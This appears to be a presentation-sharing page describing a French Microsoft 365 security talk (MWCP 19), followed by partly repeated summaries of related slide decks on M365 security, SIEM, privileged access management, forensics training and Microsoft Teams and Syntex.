Présentation utilisée lors de la journée de préconférence complète du MWCP 19 animée par les MVP Guillaume Mathieu et Sébastien Paulet sur le sujet de la sécurité sur M365 dans les locaux Microsoft France.
Quelles sont les attaques que peuvent subir les comptes O365/M365? Comment s'en prémunir?
Microsoft 365 provides holistic security across these four aspects of security.
By helping enterprise businesses secure corporate data and manage risk in today’s mobile-first, cloud-first world Microsoft 365 enables customers to digitally transform by unifying user productivity and enterprise security tools into a single suite that enables the modern workplace.
Identity & Access Mgmt
Secure identities to reach zero trust
Threat Protection
Help stop damaging attacks with integrated and automated security
Information Protection
Protect sensitive information anywhere it lives
Security Management
Strengthen your security posture with insights and guidance
Community IT CTO Matthew Eshleman reviews security fundamentals in Office 365. Small and medium sized nonprofits are in a great position to take advantage of the native security tools offered in Office 365.
Identity— Help protect against identity compromise and identify potential breaches before they cause damage
Devices—Enhance device security while enabling mobile work and BYOD
Apps and Data—Boost productivity with cloud access while keeping information protected
Infrastructure—Take a new approach to security across your hybrid environment
Cyberspace is the new battlefield:
We’re seeing attacks on civilians and organizations from nation states. Attacks are no longer just against governments or enterprise systems directly. We’re seeing attacks against private property—the mobile devices we carry around everyday, the laptop on our desks—and public infrastructure. What started a decade-and-a-half ago as a sense that there were some teenagers in the basement hacking their way has moved far beyond that. It has morphed into sophisticated international organized crime and, worse, sophisticated nation state attacks.
Personnel and resources are limited:
According to an annual survey of 620 IT professional across North America and Western Europe from ESG, 51% respondents claim their organization had a problem of shortage of cybersecurity skills—up from 23% in 2014.1 The security landscape is getting more complicated and the stakes are rising, but many enterprises don’t have the resources they need to meet their security needs.
Virtually anything can be corrupted:
The number of connected devices in 2018 is predict to top 11 billion – not including computers and phones. As we connect virtually everything, anything can be disrupted. Everything from the cloud to the edge needs to be considered and protected.2
This document provides a checklist for hardening the security of Windows Server systems. It outlines best practices for organizational security, preparing, installing, and configuring Windows Server, as well as user account, network, registry, and general security settings. It also addresses audit policy, software security, and finalization steps like imaging servers. Implementing the guidelines can help reduce security vulnerabilities and the risk of attacks compromising critical systems and data.
Présentation de la suite ELK dans un contexte SIEM et zoom sur Wazuh (OSSEC) , IDS open source
Venez découvrir comment être proactif face aux problèmes de cyber sécurité en analysant les données fournies par vos équipements et applications critiques.
Computer hacking forensic investigation refers to the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks. EC-Council's CHFI v9 program incorporates input from experts and practitioners and has been developed following thorough research into current market requirements, job tasks in security and industry needs.
CHFI v9
- Covers the latest forensics examination techniques, including Linux and MAC Forensics.
- Includes new modules on digital forensics laws and standards
- Added more than 40% new labs on anti-forensics techniques, database, cloud, and malware forensics
Microsoft 365 provides holistic security across these four aspects of security.
By helping enterprise businesses secure corporate data and manage risk in today’s mobile-first, cloud-first world Microsoft 365 enables customers to digitally transform by unifying user productivity and enterprise security tools into a single suite that enables the modern workplace.
Identity & Access Mgmt
Secure identities to reach zero trust
Threat Protection
Help stop damaging attacks with integrated and automated security
Information Protection
Protect sensitive information anywhere it lives
Security Management
Strengthen your security posture with insights and guidance
Community IT CTO Matthew Eshleman reviews security fundamentals in Office 365. Small and medium sized nonprofits are in a great position to take advantage of the native security tools offered in Office 365.
Identity— Help protect against identity compromise and identify potential breaches before they cause damage
Devices—Enhance device security while enabling mobile work and BYOD
Apps and Data—Boost productivity with cloud access while keeping information protected
Infrastructure—Take a new approach to security across your hybrid environment
Cyberspace is the new battlefield:
We’re seeing attacks on civilians and organizations from nation states. Attacks are no longer just against governments or enterprise systems directly. We’re seeing attacks against private property—the mobile devices we carry around everyday, the laptop on our desks—and public infrastructure. What started a decade-and-a-half ago as a sense that there were some teenagers in the basement hacking their way has moved far beyond that. It has morphed into sophisticated international organized crime and, worse, sophisticated nation state attacks.
Personnel and resources are limited:
According to an annual survey of 620 IT professional across North America and Western Europe from ESG, 51% respondents claim their organization had a problem of shortage of cybersecurity skills—up from 23% in 2014.1 The security landscape is getting more complicated and the stakes are rising, but many enterprises don’t have the resources they need to meet their security needs.
Virtually anything can be corrupted:
The number of connected devices in 2018 is predict to top 11 billion – not including computers and phones. As we connect virtually everything, anything can be disrupted. Everything from the cloud to the edge needs to be considered and protected.2
This document provides a checklist for hardening the security of Windows Server systems. It outlines best practices for organizational security, preparing, installing, and configuring Windows Server, as well as user account, network, registry, and general security settings. It also addresses audit policy, software security, and finalization steps like imaging servers. Implementing the guidelines can help reduce security vulnerabilities and the risk of attacks compromising critical systems and data.
Présentation de la suite ELK dans un contexte SIEM et zoom sur Wazuh (OSSEC) , IDS open source
Venez découvrir comment être proactif face aux problèmes de cyber sécurité en analysant les données fournies par vos équipements et applications critiques.
Computer hacking forensic investigation refers to the process of detecting hacking attacks and properly extracting evidence to report the crime and conduct audits to prevent future attacks. EC-Council's CHFI v9 program incorporates input from experts and practitioners and has been developed following thorough research into current market requirements, job tasks in security and industry needs.
CHFI v9
- Covers the latest forensics examination techniques, including Linux and MAC Forensics.
- Includes new modules on digital forensics laws and standards
- Added more than 40% new labs on anti-forensics techniques, database, cloud, and malware forensics
This document provides an overview and demonstration of using open source tools for security information and event management (SIEM). It begins with an introduction to SIEM and the ELK stack (Elasticsearch, Logstash, Kibana) for data aggregation, correlation, alerting and dashboards. The document demonstrates using Logstash to parse Apache logs and load them into Elasticsearch. It also discusses clustering and sizing requirements. Finally, it introduces Wazuh as an open source SIEM solution built on OSSEC and the ELK stack.
CyberArk Training is Privileged Account Security Solutions across the global organizations. Best CyberArk Online Training and corporate Training by experts
Wireless networks are vulnerable to attacks if not properly secured. The document provides guidance on securing wireless networks through steps like enabling WPA2 encryption, changing default passwords, disabling unneeded services, updating firmware, using firewalls and intrusion detection. It emphasizes implementing a layered security approach using policies, procedures, logging, monitoring and educating users to protect wireless networks and the overall infrastructure.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
Alphorm.com Formation Microsoft 365 (MS-101) : Sécurité et MobilitéAlphorm
Ce cours couvre trois éléments centraux de l'administration d'entreprise Microsoft 365 : La gestion de la sécurité Microsoft 365, la gestion de la conformité Microsoft 365 et la gestion des périphériques Microsoft 365
Platform + Intelligence + Partners
This new understanding has led us to build new solutions for our customers. It informs our entire approach across three critical elements:
Building a platform that looks holistically across all the critical end-points we talked about – building security into our platform as well as providing security tools and technologies to you
Acting on the Intelligence that comes from our security-related signals and insights – helps you and us to detect threats more quickly
Fostering a vibrant ecosystem of partners who help us raise the bar across the industry – we know we’re not your only security vendor, and we want to work with the industry and take a holistic approach to technology
Microsoft 365 provides holistic security that is aligned to these four pillars of security.
By helping enterprise businesses secure corporate data and manage risk in today’s mobile-first, cloud-first world Microsoft 365 E5 enables customers to digitally transform by unifying user productivity and enterprise security tools into a single suite that enables the modern workplace.
Identity & Access Mgmt
Protect users’ identities and control access to valuable resources based on user risk level
Information Protection
Ensure documents and emails are seen only by authorized people
Threat Protection
Protect against advanced threats and recover quickly when attacked
Security Management
Gain visibility and control over security tools
Patch management is critical to reducing your attack surface and keeping your endpoints and business running smoothly. Unfortunately, it's also a process that must be repeated weekly, monthly, quarterly, and whenever critical fixes have been identified for your environment. The good news is: with the right tools and some advance planning, this process can run smoothly and leave your IT team with more time to support core business goals.
Join us to learn about trends in patch management, including the latest ways Ivanti is helping Security and IT teams work together like a well-oiled machine.
Security Information and Event Management (SIEM)hardik soni
CloudAccess SIEM provides security information and event management capabilities through a single integrated platform. It combines security information management, security event management, and log management functions. Some key features include intrusion detection, 24/7 monitoring, forensic analysis, vulnerability reporting, and anomalous activity alerts. CloudAccess SIEM can be deployed as software, an appliance, or a managed service. It provides real-time analysis of security alerts from network devices and applications.
Knowledge is power. This session will explore the rich real-time telemetry and tools available in Windows and in our cloud services for analyzing security activity in your IT environment.
This Deck, gives you an overview of the zero trust security posture, considerations you should have while looking to adopt that posture, and the advantages of doing so.
You have more to secure than ever before. A data breach can happen to any organization, and it's a growing concern among companies both large and small. Take a look at these best practices and see if any of these have gotten lost as you consider your 2017 plan.
The document introduces system security, defining it as protecting information system resources to preserve integrity, availability, and confidentiality. It discusses the CIA security triad of confidentiality, integrity, and availability, along with additional aspects of authenticity and accountability for complete security. The document defines key security terminology from RFC 2828 and covers security threats like interception, interruption, and modification. It also examines hardware, software, and data vulnerabilities that can threaten system security.
This document discusses access controls and various access control models. It defines access control as granting or denying approval to use specific resources. It describes common access control models like discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC). It also discusses access control terminology, technical processes, and best practices for implementing access controls.
This module discusses password cracking techniques such as brute force password guessing, dictionary attacks, and using password cracking tools. It covers different types of password attacks like passive online attacks, active online attacks, offline attacks, and non-electronic attacks. The document also explains password hashing methods like LM hashes and NTLM hashes that are commonly targeted by attackers. Various password cracking tools are introduced, along with mitigation techniques organizations can implement like using longer and more complex passwords.
This document discusses privileged access management (PAM). PAM is defined as securing and managing privileged accounts, which hold special permissions like administrator access. The document outlines why PAM is important given recent data breaches from compromised privileged accounts. It also discusses how identity is the new security perimeter and that PAM is a collaborative effort involving technology, people and processes. Examples of PAM use cases and an adoption approach emphasizing the need for leadership support and prioritizing critical systems are also provided.
Welcome to Cyber Threat Simulation Training powered by Tonex. Cyber Threat Simulation Training covers standards of cyber threats, progressed cyber fighting and threat simulation standards.
Cyber Threat Simulation Training is splitted into different parts comprising of essential cyber security, progressed cyber security, standards of cyber threat and hands-on threat simulation works out.
Learn about:
Basic cyber threat principles
Principles on threat environment
Principles of cyber simulation and modeling
Cyber threat simulation principles
Web application cyber threat fundamentals
Network and application reconnaissance
Data exfiltration & privilege escalation
Exploit application misconfigurations and more
Firewall and Threat Prevention at work
Tools to model and simulate cyber threat
Tools to monitor attack traffic
Who Should Attend:
Cyber Threat Analysts
Digital Forensic Analysts
Incident Response Team Members
Threat Hunters
Federal Agents
Law Enforcement Officials
Military Officials
Course Modules:
Cyberwarfare and Cyberterrorism
Overview of Global Cyber Threats
Principles of Cyber Threat Simulation
Cyber Threat Intelligence
Simulating Cyber Threats
Incident Detection
Response Threat Simulation
Cyber Threat Simulation Training.Price: $3,999.00 . Length: 3 Days.
Request more info about this Cyber Threat Simulation Training. Call +1-972-665-9786. Visit www.tonex.com/training-courses/cyber-threat-simulation-training/
This document discusses data security and password protection. It explains that passwords should be strong, with a minimum of 6 characters including letters, numbers, and symbols. Longer passwords are more secure, with 12+ character passwords being very secure. The document also discusses encryption, explaining that encryption translates plain text into encrypted ciphertext using a key, and the same key is needed for decryption. Encryption securely protects data by allowing only authorized parties with the key to access it. Common encryption methods include DES, RSA, AES, Blowfish and Twofish. Free encryption tools include Veracrypt, Bitlocker and AxCrypt.
A malware attack is a cyber-attack that is carried out by a malicious program or code, or malware. Malware can be used to steal information, modify and delete data, monitor computer activity and cause damage to computer systems.
aMS Strasbourg Cybersec et M365 en action 14102021Sébastien Paulet
Session présentant les principales menaces sur les tenant M365 et comment s'en protéger.
Présentation de la session de l'aMS Strasbourg le 14/10/2021 avec Clément Serafin.
This document provides an overview and demonstration of using open source tools for security information and event management (SIEM). It begins with an introduction to SIEM and the ELK stack (Elasticsearch, Logstash, Kibana) for data aggregation, correlation, alerting and dashboards. The document demonstrates using Logstash to parse Apache logs and load them into Elasticsearch. It also discusses clustering and sizing requirements. Finally, it introduces Wazuh as an open source SIEM solution built on OSSEC and the ELK stack.
CyberArk Training is Privileged Account Security Solutions across the global organizations. Best CyberArk Online Training and corporate Training by experts
Wireless networks are vulnerable to attacks if not properly secured. The document provides guidance on securing wireless networks through steps like enabling WPA2 encryption, changing default passwords, disabling unneeded services, updating firmware, using firewalls and intrusion detection. It emphasizes implementing a layered security approach using policies, procedures, logging, monitoring and educating users to protect wireless networks and the overall infrastructure.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
Alphorm.com Formation Microsoft 365 (MS-101) : Sécurité et MobilitéAlphorm
Ce cours couvre trois éléments centraux de l'administration d'entreprise Microsoft 365 : La gestion de la sécurité Microsoft 365, la gestion de la conformité Microsoft 365 et la gestion des périphériques Microsoft 365
Platform + Intelligence + Partners
This new understanding has led us to build new solutions for our customers. It informs our entire approach across three critical elements:
Building a platform that looks holistically across all the critical end-points we talked about – building security into our platform as well as providing security tools and technologies to you
Acting on the Intelligence that comes from our security-related signals and insights – helps you and us to detect threats more quickly
Fostering a vibrant ecosystem of partners who help us raise the bar across the industry – we know we’re not your only security vendor, and we want to work with the industry and take a holistic approach to technology
Microsoft 365 provides holistic security that is aligned to these four pillars of security.
By helping enterprise businesses secure corporate data and manage risk in today’s mobile-first, cloud-first world Microsoft 365 E5 enables customers to digitally transform by unifying user productivity and enterprise security tools into a single suite that enables the modern workplace.
Identity & Access Mgmt
Protect users’ identities and control access to valuable resources based on user risk level
Information Protection
Ensure documents and emails are seen only by authorized people
Threat Protection
Protect against advanced threats and recover quickly when attacked
Security Management
Gain visibility and control over security tools
Patch management is critical to reducing your attack surface and keeping your endpoints and business running smoothly. Unfortunately, it's also a process that must be repeated weekly, monthly, quarterly, and whenever critical fixes have been identified for your environment. The good news is: with the right tools and some advance planning, this process can run smoothly and leave your IT team with more time to support core business goals.
Join us to learn about trends in patch management, including the latest ways Ivanti is helping Security and IT teams work together like a well-oiled machine.
Security Information and Event Management (SIEM)hardik soni
CloudAccess SIEM provides security information and event management capabilities through a single integrated platform. It combines security information management, security event management, and log management functions. Some key features include intrusion detection, 24/7 monitoring, forensic analysis, vulnerability reporting, and anomalous activity alerts. CloudAccess SIEM can be deployed as software, an appliance, or a managed service. It provides real-time analysis of security alerts from network devices and applications.
Knowledge is power. This session will explore the rich real-time telemetry and tools available in Windows and in our cloud services for analyzing security activity in your IT environment.
This Deck, gives you an overview of the zero trust security posture, considerations you should have while looking to adopt that posture, and the advantages of doing so.
You have more to secure than ever before. A data breach can happen to any organization, and it's a growing concern among companies both large and small. Take a look at these best practices and see if any of these have gotten lost as you consider your 2017 plan.
The document introduces system security, defining it as protecting information system resources to preserve integrity, availability, and confidentiality. It discusses the CIA security triad of confidentiality, integrity, and availability, along with additional aspects of authenticity and accountability for complete security. The document defines key security terminology from RFC 2828 and covers security threats like interception, interruption, and modification. It also examines hardware, software, and data vulnerabilities that can threaten system security.
This document discusses access controls and various access control models. It defines access control as granting or denying approval to use specific resources. It describes common access control models like discretionary access control (DAC), mandatory access control (MAC), and role-based access control (RBAC). It also discusses access control terminology, technical processes, and best practices for implementing access controls.
This module discusses password cracking techniques such as brute force password guessing, dictionary attacks, and using password cracking tools. It covers different types of password attacks like passive online attacks, active online attacks, offline attacks, and non-electronic attacks. The document also explains password hashing methods like LM hashes and NTLM hashes that are commonly targeted by attackers. Various password cracking tools are introduced, along with mitigation techniques organizations can implement like using longer and more complex passwords.
This document discusses privileged access management (PAM). PAM is defined as securing and managing privileged accounts, which hold special permissions like administrator access. The document outlines why PAM is important given recent data breaches from compromised privileged accounts. It also discusses how identity is the new security perimeter and that PAM is a collaborative effort involving technology, people and processes. Examples of PAM use cases and an adoption approach emphasizing the need for leadership support and prioritizing critical systems are also provided.
Welcome to Cyber Threat Simulation Training powered by Tonex. Cyber Threat Simulation Training covers standards of cyber threats, progressed cyber fighting and threat simulation standards.
Cyber Threat Simulation Training is splitted into different parts comprising of essential cyber security, progressed cyber security, standards of cyber threat and hands-on threat simulation works out.
Learn about:
Basic cyber threat principles
Principles on threat environment
Principles of cyber simulation and modeling
Cyber threat simulation principles
Web application cyber threat fundamentals
Network and application reconnaissance
Data exfiltration & privilege escalation
Exploit application misconfigurations and more
Firewall and Threat Prevention at work
Tools to model and simulate cyber threat
Tools to monitor attack traffic
Who Should Attend:
Cyber Threat Analysts
Digital Forensic Analysts
Incident Response Team Members
Threat Hunters
Federal Agents
Law Enforcement Officials
Military Officials
Course Modules:
Cyberwarfare and Cyberterrorism
Overview of Global Cyber Threats
Principles of Cyber Threat Simulation
Cyber Threat Intelligence
Simulating Cyber Threats
Incident Detection
Response Threat Simulation
Cyber Threat Simulation Training.Price: $3,999.00 . Length: 3 Days.
Request more info about this Cyber Threat Simulation Training. Call +1-972-665-9786. Visit www.tonex.com/training-courses/cyber-threat-simulation-training/
This document discusses data security and password protection. It explains that passwords should be strong, with a minimum of 6 characters including letters, numbers, and symbols. Longer passwords are more secure, with 12+ character passwords being very secure. The document also discusses encryption, explaining that encryption translates plain text into encrypted ciphertext using a key, and the same key is needed for decryption. Encryption securely protects data by allowing only authorized parties with the key to access it. Common encryption methods include DES, RSA, AES, Blowfish and Twofish. Free encryption tools include Veracrypt, Bitlocker and AxCrypt.
A malware attack is a cyber-attack that is carried out by a malicious program or code, or malware. Malware can be used to steal information, modify and delete data, monitor computer activity and cause damage to computer systems.
aMS Strasbourg Cybersec et M365 en action 14102021Sébastien Paulet
Session présentant les principales menaces sur les tenant M365 et comment s'en protéger.
Présentation de la session de l'aMS Strasbourg le 14/10/2021 avec Clément Serafin.
Maxime Rastello - La gestion des identités avec Azure - Global Azure Bootcamp...AZUG FR
La gestion des identités est primordiale dans tout projet cloud Microsoft. Tour d’horizon d’Azure Active Directory, comment gérer la synchronisation des identités avec votre annuaire local avec Azure Active Directory Connect. Les problématiques de fédération d’identité seront également abordées.
Ce sont les slides de notre session à Collab 365 sur les pièges à éviter lors d'un déploiement Office 365.
Avec Yoan Topenot
Très proche de la session délivvrée à Nantes - Rebuild 2015
Windows PowerShell est le langage de script incontournable pour l’automatisation des tâches simples ou complexes sur les environnements Windows. Cette session vous propose un retour d’expérience de l’utilisation de Windows PowerShell sur des cas concrets tirés de projets, accompagné de démonstrations.
Cycle de vie d'un projet web agile avec TFS 2013, Azure VM et MonacoMicrosoft
Je réalise un projet web en mode agile. TFS 2013 et Visual Studio Online peuvent-ils m'aider ? Comment ? » Venez voir comment l'ensemble des possibilités de TFS 2013 combiné à Visual Studio 2013 supporte la réalisation d'un projet Web en Scrum grâce (entre autre) aux déploiements automatiques dans des VMs Azure et aux nouvelles capacités de Visual Studio Online. Le programme consistera en un jeu de rôle combinant les capacités de Visual Studio 2013, le pilotage projet grâce à TFS (organisation des scénarios et des tâches), comment faire le standup meeting avec l'interface web (planification et décomposition des scénarios / exigences), le code review, la création de tests unitaires, la création d’une infrastructure Azure pour gérer les déploiements automatiques, et enfin l'exécution des tests utilisateurs suite à la demande de revue par le client.
Speakers : Franck Farré (SQLI), Fabrice Hautot (SQLI)
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Microsoft Décideurs IT
Bien gérer ses identités est fondamental à la fois sur le cloud et on premises. Différents choix s'offrent à vous avec Azure AD notamment. Comment intégrer une solution de Single Sign On sur l'ensemble de la plateforme Office ? Cette session vous donnera toutes les clés.
Hybride Office 365, Azure AD, SSO : comment bien gérer ses identités ? Quelle...Microsoft Technet France
Bien gérer ses identités est fondamental à la fois sur le cloud et on premises. Différents choix s'offrent à vous avec Azure AD notamment. Comment intégrer une solution de Single Sign On sur l'ensemble de la plateforme Office ? Cette session vous donnera toutes les clés.
Protéger vos données à demeure avec le nouveau service Microsoft RMS et les b...Microsoft Technet France
FFace à l’inflation réglementaire, à la consumérisation de l'IT (CoIT) et au « Bring Your Own Device » (BYOD), à l'explosion du numérique qui dévore inexorablement notre monde, à l'entreprise sociale qui permet de nouvelles formes de collaboration, etc., les entreprises de toutes tailles sont confrontées à des besoins croissants de protection de leurs informations sensibles. Dans le même temps, ces entreprises doivent partager en toute sécurité cette même information entre les collaborateurs appropriés et avec d'autres personnes à l'intérieur et à l'extérieur du réseau d'entreprise. Le nouveau service Microsoft de gestion de droits (Microsoft Rights Management service ou RMS) offre la possibilité de créer et consommer des contenus protégés tels que les mèls et les documents de tout type (et pas seulement les documents Microsoft Office). Ce service est disponible sous forme d'abonnement autonome pour une infrastructure à demeure avec le connecteur Microsoft RMS. Découvrez dans cette session comment activer ce service, déployer facilement le connecteur RMS et dès lors bénéficier directement de ce service - en lieu et place d’une infrastructure AD RMS - dans Exchange Server, SharePoint Server et Microsoft Office ainsi que dans Windows Server pour appliquer une protection persistante sur le contenu de façon à répondre aux besoins spécifique de votre entreprise. A l'ère "post-Snowden" où la confiance s’installe dorénavant comme une question centrale – la confiance ne se décrète pas mais se mérite… comme chacun sait -, cette session abordera certaines capacités complémentaires du service. Elle illustrera ainsi la capacité « Bring Your Own Key » (BYOK). Si vous avez besoin d'utiliser une clé générée par, archivée et placée sous le contrôle de vos responsables de sécurité, cette capacité est faite pour vous ! La session présentera comment cette capacité permet d’assurer que la clé de votre locataire Microsoft RMS est traitée dans un module de sécurité matériel (HSM) de notre partenaire Thalès. La session abordera également la capacité de journalisation quasi-temps réel de toutes les activités liées à Microsoft RMS et à l’utilisation de vos clés (avec la capacité BYOK). Elle illustrera la mise en œuvre et l’exploitation de cette capacité pour ainsi surveiller l'utilisation de votre locataire Microsoft RMS au fil du temps.
Speakers : Eric Portrait (Thales), Philippe Beraud (Microsoft), Arnaud Jumelet (Microsoft France)
Protéger vos données dans un contexte BYOD/Office 365 avec le nouveau service...Microsoft Technet France
Face à l’inflation réglementaire, à la consumérisation de l'IT (CoIT) et au « Bring Your Own Device » (BYOD), à l'explosion du numérique qui dévore inexorablement notre monde, à l'entreprise sociale qui permet de nouvelles formes de collaboration, etc., les entreprises de toutes tailles sont confrontées à des besoins croissants de protection de leurs informations sensibles. Dans le même temps, ces entreprises doivent partager en toute sécurité cette même information entre les collaborateurs appropriés et avec d'autres personnes à l'intérieur et à l'extérieur du réseau d'entreprise. Le nouveau service Microsoft de gestion de droits (Microsoft Rights Management service ou RMS) offre la possibilité de créer et consommer des contenus protégés tels que les mèls et les documents de tout type (et pas seulement les documents Microsoft Office). Ce service fait partie intégrante de l’abonnement d'entreprise d'Office 365 ou peut être souscrit comme complément en fonction de votre plan. Découvrez dans cette session, comment activer ce service, et l’utiliser dans Exchange Online, SharePoint Online et Microsoft Office ProPlus pour appliquer une protection persistante sur le contenu de façon à répondre aux besoins spécifiques de votre entreprise. Cette session abordera également l’application de partage RMS qui fonctionne sur les appareils les plus répandus (téléphones ou tablettes sous iOS ou Android, Mac sous Mac OS X, etc. et pas seulement des PC ou des tablettes Windows ou encore des téléphones Windows Phone). Cette session illustrera également comment Microsoft RMS, en s'appuyant sur Windows Azure Active Directory, agit comme un concentrateur de confiance pour la collaboration sécurisée où votre entreprise peut facilement partager des informations avec d'autres organisations sans configuration additionnelle ou installation supplémentaire. Ces autres organisations peuvent être des clients existants du service RMS ou bien peuvent utiliser les possibilités offertes par l’offre gratuite Microsoft RMS pour les particuliers.
Speakers : Philippe Beraud (Microsoft), Arnaud Jumelet (Microsoft France)
aMS Aachen -Personal and confidential data - how to manage them in M365 2022-...Sébastien Paulet
Understand the impact local reglementations, the process to be compliant with it and discover which feature Microsoft provides out of the box on your tenant to share them securly.
USed at aMS Aachen 15/11/2022
aMS Southeast Asia - Security and compliance M365 with labels 16102021Sébastien Paulet
Session about how to use Microsoft sensitivity labels and retention labels to improve compliance and information protection for content stored in M365.
Session given during aMS Southeast Asia on 10/16/2021
Microsoft Syntex - Digitalisez vos contenus d'entreprise @MWCP21 20/01/2021Sébastien Paulet
Présentation donné e lors de a MWCP21 eavec Rachida Yahmi pour présenter toutes les capacités du projet Syntex pour démocratiser la dématérialisation des documents dans vos entreprises
Cortex -Syntex Digitalize your company info @M365 California 22/01/2020Sébastien Paulet
Présentation with Patrick Guimonet during M365 Friday California 2021 (01/22/2021) to demo Syntex capabilities et explain future Topic Experience features
Cortex/Syntex : Digitalize your company information -aOS South Asia 24/10/2020Sébastien Paulet
Deep dive in SharePoint Syntex and Cortex : document understanding, form processing, knowledge management baased on machien learning and machine teraching.
Seession with Patrick Guimonet for aOS South Asia 24/10/2020
aOS Nice 2020 : Les nouveautés du MS Ignite 2020 sur les Content ServicesSébastien Paulet
Présentation des nouveautés présentées par Microsoft lors du MS Ignite 2020 lié à la gestion des contenus d'entreprise. AU programme : Teams, SharePoint, OneDrive, Stream, Conformité et Cortex/Syntex
Slides de l'aOS Nice du 08/10/2020.
M365 Gurgaon 2020 - How to manage sensitive and personal data in M365Sébastien Paulet
This document discusses managing personal and sensitive data in Microsoft 365. It provides an overview of sensitivity labels which can be used to classify and protect sensitive content. It also discusses companies' obligations under data protection regulations like the GDPR and PDPB to obtain consent, ensure data quality, limit retention, and more. The document explains how Microsoft acts as a data subcontractor and the responsibilities of both companies and Microsoft. It provides guidance on creating and applying sensitivity labels as well as using other tools like retention labels, audit logs, and Azure Information Protection.
Session délivrée en ligne lors de l'aOS Solidarité Calédonie durant le confinement de l'ile le 10/04/2020 avec Sylver SCHORGEN et Julien CHABLE qui présenteront les fonctionnalités à connaitre dans Teams au delà de la simple utilisation en autodidacte. Au programme : bonnes pratiques, gestion des canaux, canaux privés, onglets, modèles d'équipe, recherche, organigrammes, options d'organisation des réunions et gestion des tâches dans Planner.
Session délivrée en ligne lors de l'aOS Solidarité Calédonie durant le confinement de l'ile le Vendredi 17/04/2020 avec Florian, Julien, Sylver pour parler de la gouvernance Teams.
Au programme : comprendre les artefacts techniques derrière un Teams, classer et organiser les Teams pour avoir la main sur l'existant, maîtriser leur cycle de vie de la création et à la suppression et suivre leur usage.
Session délivrée en ligne lors de l'aOS Solidarité Calédonie durant le confinement de l'ile le 24/04/2020 avec Florian GUERIN et Julien CHABLE pour voir ensemble, après une mise en place de Teams dans l'urgence pour nombre d'entre nous, les actions à planifier par la suite.
Au programme :
Pourquoi garder Teams après le confinement
Pourquoi choisir Teams comme solution plutot qu'une autre
Impact sur le SI (réseau, postes, applicatifs)
Licenses
Lier à l'AD
Sécuriser
Déploiement
Accompagnement au changement et formation
aOS Solidarite NC M365 Virtual Marathon - O365 par les usagesSébastien Paulet
Présentation de l'ensemble des briques de la suite O365 sous le prisme des usages. Comprendre ce que font les différentes briques (Echange, SharePoint, OneDrive, Planner, ToDo, Power Automate, Power Apps, Power BI, Yammer, Delve, etc.) et dans quels cas d'usage utiliser l'une plutôt que l'autre. Indispensable pour clarifier tout cela dans votre esprit si vous débutez, ou trouver comment présenter clairement cela à vos utilisateurs si vous vous êtes déjà lancés.
Session donnée avec Florian Guerin, Julien Chable, Sylver Schorgen le 28/05/2020 dans le cadre de l'aOS Solidarité NC et du M365 Virtual Marthon
M365 Virtual Marathon - Retour Ignite et Build sur les content services et pr...Sébastien Paulet
Présentations des nouveautés annoncées à l’Ignite 2019 et la Build 2020 autour de la gestion de contenus : le Knowledge management, le projet Cortex, lancement dans la dématérialisation, les nouveautés pour les Intranet, la GED, la migration des contenus, la conformité et la sécurité
Session délivrée en ligne lors du M365 Virtual Marathon 2020 le 28/05/2020
The document discusses various cybersecurity threats that can impact Microsoft 365 environments and how to mitigate them. It begins with an overview of common phishing and password spraying attacks before examining how to configure security features in Microsoft 365 like Exchange Online Protection, Azure Active Directory Premium, and Azure MFA to prevent account takeovers. It then covers techniques attackers use to bypass MFA and discusses how passwordless authentication and FIDO2 can provide stronger protection. The document also provides recommendations for protecting sensitive user and administrator data as well as securing endpoints from threats like ransomware.
SlideDeck used during M365 May event for Australia and New Zeland 08/05/2020
Facing the important number of document related applications in Office 365 (SharePoint, O365 Groups, One Drive, Teams, Yammer), which one is the best to use for which kind of document? When to use them? Once clarified this question, we will focus on SharePoint, the central content manager of O365, and study its capabilities as a DMS (document management system) in comparison with the other classical vendors. For IT Decision maker, get a clear view about which tool to promote to end users. Get a reusable governance plan for document management. Get successful SharePoint projects by designing sustainable solutions.
Télétravail et collaboration avec Microsoft Teams - aOS Solidarité Calédonie ...Sébastien Paulet
Présentation sur la manière de mettre en place le télétravail en entreprise. Les actions cotés direction, managers et collaborateurs. Suivi d'une rapide présentation de la solution Teams et de comment elle peut permettre de répondre à ces besoins.
Session délivrée en ligne lors de l'aOS Solidarité Calédonie durant le confinement de l'ile le 27/03/2020
Présentation des principales menaces de sécurité sur un tenant O365 et les techniques pour se protéger avec ou sans EMS.
Slidedeck utilisé pour l'aOS Noumea le 28/02/2020.
MS ignite : les nouveautés autour des content services et projet cortex - aOS...Sébastien Paulet
Présentation des principales nouveauté annoncé au MSIgnite 2019 relatives au Content Management et focus sur le projet Cortex.
Slidedeck utilisé pour l'aOS Noumea le 28/02/2020.
Back from MS Ignite 2019 content service projet cortexSébastien Paulet
Quelles sont les nouveautés dans la suites O365 en lien avec les Content Services et en particulier le projet Cortex? Réponse par Patrick Guimonet et Sébastien Paulet.
Slides en FR de la conférence donnée lors du MWCP 19 à Paris le 10 Décembre 2019
aOS Kuala Lumpur 2019 Manage sensitive and personal data in O365Sébastien Paulet
Slidedeck used on aOS Kuala LUmpur session on 22/10/2019
One session to understand how to manage sensitive / personal data according to regulations such as PDPA (Malaysian Personal Data Protection Act 2010) or GDPR (Europe) in Microsoft Office 365
Le Comptoir OCTO - Équipes infra et prod, ne ratez pas l'embarquement pour l'...OCTO Technology
par Claude Camus (Coach agile d'organisation @OCTO Technology) et Gilles Masy (Organizational Coach @OCTO Technology)
